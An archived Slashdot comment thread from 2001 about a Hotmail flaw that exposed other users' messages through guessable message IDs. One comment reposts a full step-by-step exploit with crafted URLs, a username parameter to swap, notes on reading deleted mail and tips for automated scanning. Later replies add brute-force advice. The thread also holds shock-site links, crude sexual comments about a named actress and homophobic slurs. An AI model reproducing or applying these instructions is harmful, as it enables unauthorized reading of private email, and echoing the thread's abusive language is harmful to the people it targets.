Hotmail Hacked

SyD writes " Apparently there is a major security hole on Hotmail that could allow crackers to read your e-mail. A hacking group known as root core discovered the hole and reported it to Microsoft. " This isn't the first time that the folks who are gonna give us a internet wide universal login system had a hole. The funny part is that I posted a story almost exactly like this like 2 years ago, and about once a week, someone emails me and says "I think my boyfriend/girlfriend is cheating on me and I really need to know the backdoor into hotmail to find out". No I'm not kidding. You can't make that stuff up.

Yes you can

CmdrTaco, you can make ANYTHING up. You've often shown your quite good at it, too. When's that Linux domination thing taking place, again?

Re:Yes you can

I posted this and I'm not making it up

hmmm

[niekze]

Isn't this *after* they started moving a lot of servers to windoze from FreeBSD

Yes, probably flame bait...it's in the hostmail system...so no blame on the OS :)

Re:hmmm

well I guess he asked for it:

"a internet wide universal login system"

Oh no!

[Mr.+Sketch]

Now someone ELSE will have to read all my spam too, oh darn. They'd better fix that quick.

Re:Oh no!

[jesser]

I was going to post a similar comment, using the exact same subject. You're too fast.

Re:Oh no!

I love T1, T1 loves me. We're a hap-py fam-i-ly...

Again?

[SilLumTao]

Apparently there is a major security hole on Hotmail that could allow crackers to read your e-mail.

Score: -1, Redundant

Re:Again?

[OmegaDan]

Apparently there is a major security hole on Hotmail that could allow crackers to read your e-mail.

Score: -1, Redundant

Whats with this new trend ? say something stupid, perdict you will be moded down -- and be moded up for that ?

Re:Again?

[billybob]

he wasnt predicting he would be modded down. -1, redundant because this has happened before with hotmail. :)

Re:Again?

[talonyx]

The ARTICLE was redundant. Way to fail.

Re:Again?

[ShoeHead]

He's talking about the story, idiot.

Re:Again?

[jawad]

What's with the trend of moderators who agree with people who totally miss the point?

Saying something stupid, predicting you'd get modded down has been done since the beginning of moderation.

Re:Again?

The hole is called "License Agreement". Many people (all of the users in fact) actually voluntarily forgo all rights to the confidentiality of their correspondence by indicating their acceptance. Hackers could only do less important things by getting snippets of your mail than Microsoft could by actually having you "sign" away your RIGHTS...

Re:again?

M$ firewall in XP ? Heh, for sure it'll have pretty GUI interface, M$ users don't care much about what's inside anyway, pretty GUI is what really counts.

Re:Again?

Yes you know it's a big one called win2000 :)

Be prepared for a bigger one ,XP are coming...

First Alyson Hannigan post

yeah more more more Alyson Hannigan.

That hot grits scene on buffy last week caused me to pop my cork!

Re:First Alyson Hannigan post

She was on Stern last week. Sounded wicked hot. (Yes, I'm from MA. Wicked pissah.)

Re:First Alyson Hannigan post

goatse.cx [goatse.cx]

comp-u-geek.net [comp-u-geek.net]

Thats what I want.

and this is news?

c'mon this isn't news this is just a reality of MS and the everyday world.

Ohh and don't blame the OS blame the programmers

Re:and this is news?

In addition, intruders would first need to log in to their own Hotmail accounts, which means they'd leave a clear trail for investigators to follow, experts said.

Riight, odds of that are what? Take a given hotmail account, and then guess which couple hundred message IDs out of 10 billion correspond to something in their mailbox. Fuck you taco, that's not a security hole, thisis a security hole.

Re:and this is news?

[hillct]

No, It's not news. It's entertainment. What can we do but be entertained by occasional bouts of profound incompetence...

Hotfemail

iiiiiiiiiiiiiiiiiiiiiiiiii8888ii8888888
iiiiiiiiiiiiiiiiiii888888888888888888888888
iiiiiiiiiiiiiiii8888iii8888888888888888888888888
iiiiiiiiiiiiii8888iiiiii888888888888888888888888 88 88
iiiiiiiiiiiii88iiiiiiii888iii8888888888888888888 88 8888
iiiiiiiiiii88888888iiii8iiiiiiiiiii8888888888888 88 88888
iiiiiiiii888i8ii888888iiiiiiiiiiiiiiiiii88888888 88 8iii888
iiiiiiiiiiii88iiii88888888iiiimiiiiiiiiii8888888 88 88iiii8
iiiiiiiiii888888888888888888iMiiiiiiiiiii8888888 88 8888
iiiiiiiii88888888888888888888iiiiiiiiiiiiM888888 88 888888
iiiiiiiii8888888888888888888888iiiiiiiiiM8888888 88 8888888
iiiiiiiiii8888888888888888888888iiiiiiiM88888888 88 88888888
iiiiiiiii8888888888888888ii88888iiiiiiM888888888 88 888888888
iiiiiii88888888888888888iii88888iiiiiM8888888888 88 888iii8888
iiiiii88888888888888888iii88888iiiiMii;o*M*o;888 88 8888iiii88
iiiii88888888888888888iii8888iiiiiMiiiiiiiiiii88 88 8888iiii8
iiii88888888888888888iiii88iiiiiiMi;iiiiiiiiiii8 88 888888
iii8888888888888888888iii8iiiiiiMiiaAaiiiiiiiiM8 88 8888888iiiiiii8
iii88iii8888888888ii88iiii8iiiiMiiiiiiiiiiiii888 88 8888888888i8888
ii88ii88888888888iii8iiiiiiiiiMiiiiiiiiii;ii88i8 88 88888888888888
ii8ii8888888888888iiiiiiiiiiiMii"@@@@@@@"iiii8w8 88 8888888888888
iii88888888888i888iiiiiiiiiiMiiiii"@a@"iiiiiM8i8 88 888888888888
ii8888888888iiii88iiiiiiiiiM88iiiiiiiiiiiiiM88z8 88 88888888888888
i8888888888iiiii8iiiiiiiiiM88888iiiiiiiiiMM888!8 88 888888888888888
i888888888iiiii8iiiiiiiiiM8888888MAmmmAMVMM888*8 88 88888iii88888888
i888888iMiiiiiiiiiiiiiiiM888888888iiiiiiiMM88888 88 8888888iii8888888
i8888iiiMiiiiiiiiiiiiiiM88888888888iiiiiiMM88888 88 88888888iiii88888
ii888iiiMiiiiiiiiiiiiiM8888888888888MiiiiimM8888 88 888888888iiii8888
iii888iiMiiiiiiiiiiiiM8888i888888888888iiiimiiMm 88 888i888888iii8888
iiii88iiMiiiiiiiiiiii8888i88888888888888888iiiii iM m8iii88888iii888
iiii88iiMiiiiiiiiii8888Mii88888ii888888888888iii ii iiMm88888iiii88
iiii8iiiMMiiiiiiii8888Miii8888iiiii888888888888i ii iiiiiMm8iiiii4
iiiiiiii8Miiiiiii8888Miiiii888iiiiiii88iii888888 8i iiiiiiiMmiiii2
iiiiiii88MMiiiii8888Miiiiiii88iiiiiiii8iiiii8888 88 iiiMiiiiiM
iiiiii8888Miiiii888MMiiiiiiii8iiiiiiiiiiiMiiii88 88 iiiiMiiiiM
iiiii88888Miiiii88iMiiiiiiiiii8iiiiiiiiiiiMiii88 88 iiiiiiMiiM
iiii88i888MMiii888iMiiiiiiiiiiiiiiiiiiiiiiiMi888 8i iiiiiiiiMi
iiii8i88888Miii88iiMiiiiiiiiiiiiiiiiiiiiiiiMMi88 ii iiiiiiiiiiM
iiiiii88888Miii88iiMiiiiiiiiii*88*iiiiiiiiiiMi88 ii iiiiiiiiiiiiM
iiiii888888Miii88iiMiiiiiiiii88@@88iiiiiiiiiMii8 8i iiiiiiiiiiiiiM
iiiii888888MMii88iiMMiiiiiiii88@@88iiiiiiiiiMiii 8i iiiiiiiiiiiii*8
iiiii88888iiMiii8iiMMiiiiiiiii*88*iiiiiiiiiiMiii ii iiiiiiiiiiii88@@
iiiii8888iiiMMiiiiiiMMiiiiiiiiiiiiiiiiiiiiiMMiii ii iiiiiiiiiiii88@@
iiiiii888iiiiMiiiiiiiMMiiiiiiiiiiiiiiiiiiiMMiiMi ii iiiiiiiiiiiii*8
iiiiii888iiiiMMiiiiiiiMMMiiiiiiiiiiiiiiiiMMiiiMM ii iiiiiiiiiiiiiM
iiiiiii88iiiiiMiiiiiiiiMMMMiiiiiiiiiiiMMMMiiiiiM Mi iiiiiiiiiiiMM
iiiiiiii88iiiiMMiiiiiiiiiMMMMMMMMMMMMMMMiiiiiiii MM MiiiiiiiiMMM
iiiiiiiii88iiiiMMiiiiiiiiiiiiMMMMMMMiiiiiiiiiiii ii MMMMMMMMMM
iiiiiiiiii88iii8MMiiiiiiiiiiiiiiiiiiiiiiiiiiiiii ii iiMMMMMM
iiiiiiiiiii8iii88MMiiiiiiiiiiiiiiiiiiiiiiMiiiMii ii iiiiMM
iiiiiiiiiiiiiii888MMiiiiiiiiiiiiiiiiiiMMiiiiiiMM ii iiiiMM
iiiiiiiiiiiiii88888MMiiiiiiiiiiiiiiiMMMiiiiiiimM ii iiiMM

Re:Hotfemail

Where did you get that GIF to text converter and that picture of alison hannigan?

If you tilt down you'll see the hot grits...

Re:Hotfemail

http://www.goatse.cx/porn_for_lynx.html

Re:Hotfemail

She wishes she has big tits like that.
Don't get me wrong, she is one hot lesbian geek-witchnerdgirl, and I would make sweet love to her ass.

JK

JonKatz is responsable for this. Let's kill him now.

Slashdot requires you to wait 20 seconds between hitting 'reply' and submitting a comment.

It's been 13 seconds since you hit 'reply'!

If you this error seems to be incorrect, please provide the following in your report to Source Forge:

Browser type
User ID/Nickname or AC
What steps caused this error
Whether or not you know your ISP to be using a proxy or some sort of service that gives you an IP that others are using simultaneously.
How many posts to this form you successfully submitted during the day* Please choose 'formkeys' for the category!
Thank you.

Uhhhh no.

Re:JK

Uhhhh no.

No shit. I'm not doing they're job for them. Lazy incompetent fuckwads.

More info

More info on MSN UK

Re:More info

Heh, the people at Netscape are loving this. You can see them gloating in this article.

Re:More info

You're all homosexual!

Re:More info

Apparently all 3 of their users are really really happy about their choice as well

220000th post!

in yer face!

Re:220000th post!

YOU SUCK!

read it and weep, you idiot.

The MPAA ROCKS!

copyright violations are killing the industry. Its time you all stood up and said no to decss and yes to the FITA treaty to protect copyright holders. After all as long as you don't steal then your not affected. Its not lke you can watch your dvd's on your linux box or anything.

here's the instructions how to do it

[gol64738]

---=[ Three Steps To View Someones Emails In Hotmail (rev.2) ]=---

(Tested with Internet Explorer 5)

To view full email from some elses account do the following:

1. Login normally to Hotmail with your ID (any id)

2. Use this type of link to view specific message from specific user:

http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d1%26len%3d9999999999999999%26raw%3d0% 26login%3dusername%26domain%3dhotmail%2ecom&hm___f l=attrd&domain=hotmail.com
or
http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd ?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2 fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250% 2e22%26start%3d1%26len%3d9999999999999999%26raw%3d 0%26login%3dusername%26domain%3dhotmail%2ecom&hm__ _fl=attrd&domain=hotmail.com

From that link change values:
MSG943322803%2e16 (Message id number, its simply a counter. %2e is escaped code for ".")
username (Hotmail account name to view)

MSG number examples: MSG943322803%2e1 , MSG943322803%2e22 , MSG943322803%2e149

(remove "%26raw%3d0" if you want to view email as 'emailbox view', instead of full raw view.)
(remove "&hm___fl=attrd&domain=hotmail.com" if you dont like the hotmail frame on top.)

Note.You need to have both numbers correct
and that username must have the message to make this link work.

Note.All those "%2e" etc. are hexadecimal ascii codes. You need to use them instead of true characters.
See here for full list: http://www.december.com/html/spec/ascii.html

3. Done. If you entered correct message number & that user has it you will see it. :)
(Test it with your own other hotmail account messages first to get the idea working.)

---=[ ideas and comments for improved viewing / scan ]=---

Now typing those message numbers manually is too much
work, you could create a small utility to automatically
scan given range of messages from specific user name.
(You need to build it to work with IE, as you must be
logged in hotmail when you want to view messages..)

It also helps to know that from the message numbers,
in you own hotmail inbox,you can see about what time
is what message number been used. eg:

MSG998289581.0 arrived on 20.08.2001
MSG997936971.27 arrived on 16.08.2001.
MSG996698372.27 arrived on 01.08.2001.
MSG975960863.0 arrived on 04.12.2000.

So you dont need to scan as many message addresses
when you know from which range you are looking at.

Test messages: (Login to hotmail,then use links to view message from my test account)

raw format view: (can copy base64 encoded files too:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd ?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d 64%2e4%2e36%2e68_d1577%26login%3djokutesti99%26dom ain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.c om

email box view: (can see any attached images directly etc.:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd ?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d9702%26len%3d9687%26disk%3d64%2e4%2e3 6%2e68_d1577%26login%3djokutesti99%26domain%3dhotm ail%2ecom&hm___fl=attrd&domain=hotmail.com

*Side note on deleting messages in Hotmail:
-You can also see the message even if its deleted!
If you delete a message in hotmail, and
also empty trashcan, the message is still
viewable using this type of link.
Atleast for 6-12hrs or something.

---=[.... Status / Feedback / Fixes / Questions .....]---

Changes on the link:

Remove parameter:
%26disk%3d64%2e4%2e36%2e68_d1577
It caused Hotmail error page in some cases:
"Due to an internal error your request cannot be processed.
We apologize for the inconvenience. Please try again later."
Solution:
Remove that parameter from the link. its not required.

Changed parameters:
%26start%3d9702%26len%3d9687
in to:
%26start%3d1%26len%3d9999999999999999

Thats is just the start & length to display, of the email.
If you put too small value for len it should display
only up to that amount of characters(?).

*
If the user doesnt have the message you will get error:
"
Subject: Unable to locate message
Content-Type: text/plain; charset=us-ascii
An error has prevented from locating the message."

*
Questions:
Q1. How do i get to know which message number the user has?

A1. You cannot. You just have to guess them..one by one.
Yes, it could mean scanning thousands/millions of
messages just to see something. (slow it is)

Q2. I've sended a test message to my another account but cannot see it?
And i can still see your test messages, but not my own?

A2. Check again that your MSG number is correct, both X and Y. (MSGXXXXXXXXX.YYY)
The Y value can be between 0-nnn. (i havent seen bigger than 150)
Check that the link is correct.
Check that you are logged in to Hotmail.
Also try change the server, from "pv2fd.pav2.hotmail" to "lw14fd.law14.hotmail"
If you can see the test account messages then hotmail hasnt been fixed yet.

Q3. The hobo scanner program doesnt work?
I get some "Path not found (76)" error?

A3. True in most cases.. :)
It has more bugs than microsoft products i guess.
Its confirmed that it works atleast on win95. (latest version is hobo rev.2)
On Winnt it works but it doesnt save the scans..(bug in activating the webwindow..)
Create the output directory yourself, that fixes the path error.

Q4. Where/How can i find this exploit link myself?

A4. 1. Go to your hotmail preferences page.
2. Go to Mail Display Settings.
3. Set option 'Message Headers' to 'Advanced'.
4. Press ok to save settings.
5. View some email, you will see full message header.
6. Click 'View E-mail Message Source'.
7. Done. It opens new window with this exploitable link,
you can remove the some useless parameters from the
link and send this link to a friend for testing
if can see your message.

*
No any reply or confirmation from Hotmail so far.
The exploit still works. already almost 3 days since
reported it to Hotmail..(today is 20.08.2001)

Automated reply from hotmail security problem
submission page did gave this type of message..:p

"...Hotmail is a secure site and uses an intrusion alert that allows only one IP
address to gain access to a mailbox at a time. If anyone tries to access your
e-mail when your account is open, he or she is returned to the sign-in page.
Hotmail uses state-of-the-art software and firewall protection to offer our
members the highest security...."

Re:here's the instructions how to do it

[Visionized]

Ya know, it you could some how get that posted out somewhere that has greater volumes of general everyday traffic, maybe the rest of the public would start to get the hint at how bad MS is with security issues.

What would be really interesting is to show an example hacking the rest of the sites that use Passport type technology. This would definitely blow holes in MSs idea of being the "gatekeeper".

Our better yet, it might just close the gate!! :)

Cal

Re:here's the instructions how to do it

[haz-mat]

where is this root core website anyway?

Re:here's the instructions how to do it

[prashantp76]

I bet they are now wishing they used GET instead of POST.

Re:here's the instructions how to do it

[decaying]

I think you meant "POST and not GET"?

then again, POST is not going to help security, it is just going to hide the http parameters....

Using a session based system, SSL or even using one of those million cookies that hotmail seems to set would be more secure.

Re:here's the instructions how to do it

[jeffy124]

so how long until slashdot gets one of these or worse, this?

Re:here's the instructions how to do it

[dudle]

I just can't believe you quote an entire email and don't give credit to the author. That's just plain wrong.

My guess is you are a karma whore, nothing more. Now I may be wrong, you might be the actual author. In this case, let us know.

/. sucks. FYI, the original foundings where from

Research by wAwAsAn4
wAwAsAn4@root-core.com
Web: www.root-core.com
Email: [Digital-Vortex]@securityfocus.com

Voila.

Re:here's the instructions how to do it

[gol64738]

i am not the original author. it was my understanding that the author was included in the paste, but now i realize that it is not.

if you are personally offended, then i apologize.
oh and by the way, i am a karma whore...isn't everyone?

Re:here's the instructions how to do it

[aozilla]

I've got an easier way

1. Log in with the person's username
   
2. If you've entered the right password, you've got it, if not, keep trying until you get the right password.
   

Re:here's the instructions how to do it

[Quixote]

The "MSG" string used in the URL above looks familiar. The number after the "MSG" is actually the time when the message was received, in the Unix standard "number of non-leap seconds since 01/01/1970" format.
So, if you know roughly when your target got an email message, your search is significantly narrowed.
Ob. disclaimer: the above information if for informational purposes only :-) :-)

Re:here's the instructions how to do it

[The_Sock]

oh and by the way, i am a karma whore...isn't everyone?


I'm not.. Karma This!

I know the domain will show up, I'm not attempting to hide it. No obfusication with google's translations or whatever. I just wanted to show you not everyone really cares about karma.
(Plus I just once wanted to post a goat link.. Scratch that one off the list of things to do before I kill everyone.)

Re:here's the instructions how to do it

[ROBOKATZ]

How would SSL help?

Re:here's the instructions how to do it

http://anti.security.is

Re:here's the instructions how to do it

[[000000]]

http://www.root-core.com/

Re:here's the instructions how to do it

[Black+Parrot]

> I just can't believe you quote an entire email and don't give credit to the author.

Isn't stealing e-mail what this article is all about?

Re:here's the instructions how to do it

[Vanders]

Ya know, it you could some how get that posted out somewhere that has greater volumes of general everyday traffic

Like The Register you mean?

Re:here's the instructions how to do it

[chris_mahan]

Visionized writes:
"What would be really interesting is to show an example hacking the rest of the sites that use Passport type technology"

I think there should be at least some contracts with major industries first, so that MS can be royally sued by much larger and wealthier corporation for making a defective product and advertizing it as "God's gift to mankind", when they get hacked and 30 million US credit card numbers are leaked to China by a 3l337 15 year-old.

Of course, that would spell doom on .NET faster than anything Sun Microsystems could do.

Not, of course, that I am advocating that sort of behavior. There is a reason people should wear seatbelt: accident DO happen.

Re:here's the instructions how to do it

[MarioLanning]

Why on earth would someone spend so much time trying to hack into everyons junk mail box? Some people just have to much time.

Slashdot Hacked!

goatse.cx writes " Apparently there is are major security holes in Slash 2.2 that could allow trolls to post goatse.cx links. A hacking group known as 10gramspoppylatex discovered the hole and reported it to CmdrTaco. "

FUCK YOU TACO, FIX YOUR OWN FUCKED UP CODE BEFORE YOU WAG YOUR FINGER AT EVERYONE ELSE IN THE WORLD.

Re:Slashdot Hacked!

Not to mention, search is broken, comments.pl doesn't update, and the whole thing seems about as stable as a one legged dog. Guess Taco just couldn't wait any longer to eliminate trolltalk.

Re:Slashdot Hacked!

Yes, but when are they going to fix this bug?

Re:Slashdot Hacked!

Can you log in under another person's account without knowing their password? No. Slashot is secure. Maybe a little buggy. but it is secure.

Now SHUT THE FUCK UP.

Re:Slashdot Hacked!

Hahahahaha! That's a great bug! I wish I could write anonymous bugs at work -- there are quite a few folks around here who could use something like that!

Re:Slashdot Hacked!

Yeah too bad stuff like this is a whole lot more entertaining.

Re:Slashdot Hacked!

Command:

Re:Slashdot Hacked!

Bah this is the place you want to be.

Now if they could only figure out google's cache

[moogla]

I could open internal links on a dead site using google's cache. What is that field next to the URL anyway?

Slash bug?

[Mr.+Sketch]

There were two comments here when I posted my previous message, and now they're gone, even at -1 and my comment is the only one there. What happened to them? There was one at +1 and it wasn't off topic or anything and it's gone. Has anyone else seen this problem?

Re:Slash bug?

Well, why the hell do you think they changed the comment numbering system in slash 2.2? To make it easier for them to delete comments without people noticing, of course!

Re:Slash bug?

Well, I noticed, so it apparently doesn't work all that well. But then they could just delete all the first posts, and then what fun would /. be?

Average person?

[Chagrin]

• 
  "The average person in the street doesn't need to worry, as they would have to be specifically targeted," said Graham Cluley, an Internet security expert with antivirus firm Sophos.
  

I suppose the quux is whether I'm an "average person" or not. I think I'll go stand in the street to hedge my bets.

All I can say is this:

[Apuleius]

*whew* Good thing I still have all those y2k
supplies.

No no no

[sllort]

"In addition, intruders would first need to log in to their own Hotmail accounts, which means they'd leave a clear trail for investigators to follow, experts said."

Bring me these experts. If someone thinks my hotmail account(s) leave a clear trail to me, they're insane. They leave a clear trail to my web proxy, perhaps. Most of my accounts only ever receive one email too... "Slashdot password for user Vladinat0r"

Sigh. Experts indeed!

Re:No no no

[neuromortis]

No kidding. Yeah, every time I feel like doing something that could be potentially illegal I always use my own Hotmail account. And of course I've put my name, home address, and phone number into this account's information. Not to mention the fact that I'll do it from my home or office computer with a nice and easily traceable IP back to me.

Other tidbits I liked:

In order for intruders to access a Hotmail user's emails, they would need to know the victim's user name and then guess the number that identifies a specific email message.

Lessee now, who would most people be targeting: random users or specific family, friends, or enemies who they already have an address for? Not to mention the thousands, if not millions, of Hotmail addresses that could be reaped with a simple search.

"The average person in the street doesn't need to worry, as they would have to be specifically targeted," said Graham Cluley, an Internet security expert with antivirus firm Sophos.

Hey, Average Joe! Got any enemies who might be interested in reading your mail?

Root Core has posted on its website a scanning program that automatically guesses about one message number every second. But security experts said the program's impact is limited because, in order to work, an intruder would need to have a fast Internet connection and know how often the targeted victim checks their email account.

I wonder how many script kiddies are out there sitting next to their cable or DSL modems sniggering into their milk right now?

----------

Digital Pants...ACTIVATE!

The Registers Have Similar Article

[robbyjo]

here

Re:The Registers Have Similar Article

[robbyjo]

Moderators, have you really looked into the article?? This article actually _does_ provide an additional info: link to a GUI (albeit clunky) and inside hints on how the linking trick works (apart from what already described before).

Now I have lost 7 karmas because of this.... Bummer -- Uncaring moderators at work misuses points.

Link to the hack

[Troed]

Correct link to the hack-description

(Yeah I got that one rejected when I submitted it ... as usual :)

It's not quite so bad

[Imperator]

You need to guess the message ID, a longish string based on a timestamp and another number. And once you do that, you still can't read other messages from that account unless you guess them separately. You could try brute-forcing the message IDs, of course, but then you're relying on a fast connection (I believe there are 60 possible message IDs per second, and you rarely know exactly when a message was processed anyway) and fast servers. Besides, after all this, you'll probably find that all the target account's real mail was automatically deleted to make room for WinXP.iso.bat, attached to a message asking for advice.

Re:It's not quite so bad

[MaxwellStreet]

Exactly.

This isn't the "major" security hole that the slashdot submission suggested.

It would take a minor miracle to guess a message number correctly.

And considering what *I* use hotmail for, namely, a spam catcher, any hacker that got lucky enough would probably discover yet another way to get rich quick. If someone really wanted to read my email there, they could keep trying - but their hotmail username (at very least) would be recorded.

I don't mean to pooh-pooh this issue; but I think editorializing this into a *major* security problem (a la Code Red) is a little disingenuous, and misguided.

Re:It's not quite so bad

[aralin]

It would take a minor miracle to guess a message number correctly.

Actually... not... there is only 86400 seconds in a day and you need to worry about aprox first 100 messege numbers which makes it under ten million hits required to read your whole day correspondence. And the effectivity can be increased with clever algorithm so I will have most of them after first million.

In other words, a nice perl script that will take me about 1-2 hours to write will every day fetch all your mail without even making my computer sweat. :)

What kind of miracle is that? And shall I be proclaimed saint for performing such miracles?

Re:It's not quite so bad

a nice perl script that will take me about 1-2 hours to write

Yeah, but how long would it take CmdrTaco to write that perl script?

Re:It's not quite so bad

[erpbridge]

To paraphrase from the 1997 movie, The Saint:

"You must complete three miracles and be dead to be a Saint."

Well.... that's one... can I see the other two and the death?

Re:It's not quite so bad

[bridgette]

but their hotmail username (at very least) would be recorded.

And we all know how hard those are to get.

It's not like they make you produce a stamped letter from a notary public, or even enter a credit card number, before they give you an account. Or did you really think that suzi3952@hotmail.com (the hot young co-ed) was a real person?

Re:It's not quite so bad

[dazed-n-confused]

And considering what *I* use hotmail for, namely, a spam catcher, any hacker that got lucky enough would probably discover yet another way to get rich quick.

Yeah, but that message was meant for me! I don't want some no-good cracker to get rich quick by hacking my Hotmail account!

Re:It's not quite so bad

Let's see you write the script then, wise guy.

Re:It's not quite so bad

Uh - use Hotmail as a spam catcher?

Marvelous. ;P

Re:It's not quite so bad

[sammy+baby]

Or did you really think that suzi3952@hotmail.com (the hot young co-ed) was a real person?

Of course she is. She just happens to be a 37 year old man sitting around at home in his dirty underwear.

Re:It's not quite so bad

[goodtim]

What kind of miracle is that? And shall I be proclaimed saint for performing such miracles?

I think you need 3 miracles to be a cannonized saint.

Re:It's not quite so bad

[Alan]

Oh sure, next thing you'll tell that santa claus isn't real!

Re:It's not quite so bad

In other words, a nice perl script that will take me about 1-2 hours to write will every day fetch all your mail without even making my computer sweat. :)

I can write a script that will guess your password by the same brute force methods. If Microsoft is smart, they detect these perl scripts, shut off your IP, and get you arrested. Of course, the precondition of the if being false...

Here's rootcore's info

[Zen]

Here is the release from rootcore, and here is their exploit. Since the post is low on technical details, here goes. It's pretty simple. Messages are specified by a number. This program guesses the number.

big whooop

hotmail is not secure.

fuckers.

so what else is new?

old fucking news chumps...

220000th btw...

From my understanding of things...

[Digitalia]

It isn't Passport which is flawed but the system of Hotmail itself. This is merely an exploitation of bad data structure that is independent from Passport. That said, if you care about the security of your private communications, don't use Hotmail. Duh?

Re:From my understanding of things...

I have discovered a truly remarkable backdoor in Passport which this post is too small to contain.

The details of the hole...

[kcbrown]

% telnet www.hotmail.com 80
Trying 64.4.43.7...
Connected to 64.4.43.7.
Escape character is '^]'.
GET /root.exe
What is thy bidding, my master?

Guess they haven't gotten rid of Code Red yet! :-)

(For the humor impaired: no, I did not actually do the telnet session.)

Re:The details of the hole...

[Emugamer]

20 seconds later all of hotmail is down..... coincidence? I think not... beware of user friendly police on their way to your door

Oh no

[interstellar_donkey]

Now anyone can get in and read all the porn ads I get in my hotmail inbox.

Re:Oh no

stop signing up for the free trials...

Who to blame

[madiab]

So another bug found, my question is, why is the whole world afraid of hackers and crackers (don't even bother to argue the difference) I think that they shouldn't be afraid of the ones telling the bugs but the ones that makes them... See no evil, hear no evil, talk no evil....

One nice thing

[rjamestaylor]

Hotmail is predictable. Down, insecure, loses messages. You can count on it to fail you. I've been using Hotmail for a few years now and cannot remember a time when it was as bad as it is now! Slow, lost Body portions of the messages...cannot connect...

I'm glad for Onebox and my regular email accounts.

Sure, some would say, "It's free; shut up!" But: MS is __still__ claiming to provide a service even though there is no direct cost to me. That there's no cost doesn't mean I don't expect the service to be useable. My recourse is to leave. Is that what MS wants?

Oh, as an aside, I hope the message #292192399 bug is never fixed - "Imagine if there's no First Posts...It's easy if you try..."

Re:One nice thing

[jallen02]

I kind of like it with the messages numbered in the millions. :)

hotmail sucks!

220000th in yer face.

Re:hotmail sucks!

#2199852>> 220000th in yer face.

Ouch...face plants are so painful!

Why is MS reaping the benifits of OSS security?

[Bonker]

A monopoly is a scary thing.

Despite the fact that MS beleives very firmly in a security through obscurity model of business, they have both benevolent and malcious hackers and crackers world wide working to expose as many of their security holes as possible, thereby forcing MS to patch those holes. Code Red would still be unpatched if eEye hadn't released it's exploit POC. This exploit would still be out in the open and freely abuseable if it hadn't been released.

Since MS is the 'standard' for most internet users, it's also the recipient of all the world's security unsolicited security advice.

Re:Why is MS reaping the benifits of OSS security?

Actually code red was based on another worm, and the exploit released was not eEye's either. They did however release an advisory which gave people some heads up. But saying code red would be unpatched.....pull your head out of your ass.

Re:Why is MS reaping the benifits of OSS security?

[BradleyUffner]

Umm.. you DO know that there was a patch that would have prevented Code red released by MS aver a month before eEye released it's findings?

Re:Why is MS reaping the benifits of OSS security?

[technos]

Perhaps you should do the same..

According to my firewall logs, code red *is* unpatched on thousands of systems. Sure, there's a patch. But that doesn't make the hole, or the thousands of unpatched boxes banging away at port 80, excusable.

Re:Why is MS reaping the benifits of OSS security?

[Usuli]

Can you really say that Microsoft is the one who's reaping the benifits of OSS security? I'd say the users of Microsoft products are the ones who are ment to be gaining from the various POCs. This exploit seems to have been done for the millions of hotmail users, but sent to the people who could fix it, namely Microsoft.

Re:Why is MS reaping the benifits of OSS security?

[clare-ents]

Providing you don't have site wide redirects on NT4.

And if you do, your webserver crashes every time a Code Red talks to it.

Not exactly a well tested patch was it?

Re:Why is MS reaping the benifits of OSS security?

[BradleyUffner]

Don't know about you, but i would rather have my web server crash then becoming a mindles zombie of Code red's. But then again I would much rather haev a web server that didn't do either.

Re:Why is MS reaping the benifits of OSS security?

Uh, you *are* aware that Apache has the lion's share of the Internet, aren't you?

Re:Why is MS reaping the benifits of OSS security?

Don't know about you, but i would rather have my web server crash then becoming a mindles zombie of Code red's.

The only difference of course is that the one infected with Code Red more or less continues to function... On my cable modem, my box was getting a Code Red packet roughly every 15 minutes. Imagine rebooting every 15 minutes... real useful server you've got there...

Use yahoo mail...

Not a single security flaw yet discovered that allows unauthorized email access, and it's been running for 4+ years.

220000th!

220000th post! read it and weep!

Grimace, McDonalds character, dead at 13

I just heard sad news on talk radio -McDonalds commercial star/character Grimace was found dead in his McDonalds house this morning. I'm sure we'll all miss him - even if you didn't eat his food you've probably enjoyed one of his pornographic movies. Truly a purple American homosexual.

Related Link

Re:Grimace, McDonalds character, dead at 13

I just have a question... why is Ronald McDonald's severed head stuck on a pole in that animation?

Go with Yahoo! Mail.

[boinger]

Yahoo! Mail has never had such a flaw exposed, has it?

And Yahoo! Messenger kicks AIM's and MSN Messenger's asses.

Why tempt fate?

Re:Go with Yahoo! Mail.

[boinger]

Whoops.
Yahoo! Mail - forgot that damn http:// :)

Re:Go with Yahoo! Mail.

[Jester998]

Bah... real geeks set up their own SMTP and POP3 server. :)

That's what I do, and it works great. No (known!) security breaches so far, and I can access it from pretty much anywhere (from my laptop).

This way, you're not at the mercy of some corporation who doesn't give a shit about your privacy. Or use HushMail. It's pretty damned good, too, if a bit slow.

- Jester

Re:Go with Yahoo! Mail.

No security breaches in sendmail? Bah! You've got to be kidding.

Re:Go with Yahoo! Mail.

[Jester998]

I never mentioned sendmail, did I? SMTP != sendmail

I said I've never had a security breach ON MY SERVER. I operate a relatively unknown server, and I haven't had any problems yet. I'm sure they will eventually appear, but it's been going for a year and a half with no problems. A few attempts, but nothing that succeeded.

- Jester

Re:Go with Yahoo! Mail.

[NonSequor]

Doesn't Yahoo provide most of the services that AOL does? It seems that way to me. Yahoo has some great stuff.

Re:Go with Yahoo! Mail.

[mrmag00]

a guy I know said Yahoo used to have all their servers NFS exports avabile on the internet. as in, you could mount their servers email directories and read through every single users email. don't know how public it got, and I imagine it got patched up VERY quickly.

220000 alyson hannigans

drool...

think of all the grits, enough to fill a large city...

Step-by-step hacking tutorial

[cyberformer]

The Register has a nice guide that explains exactly how you can exploit the hack.

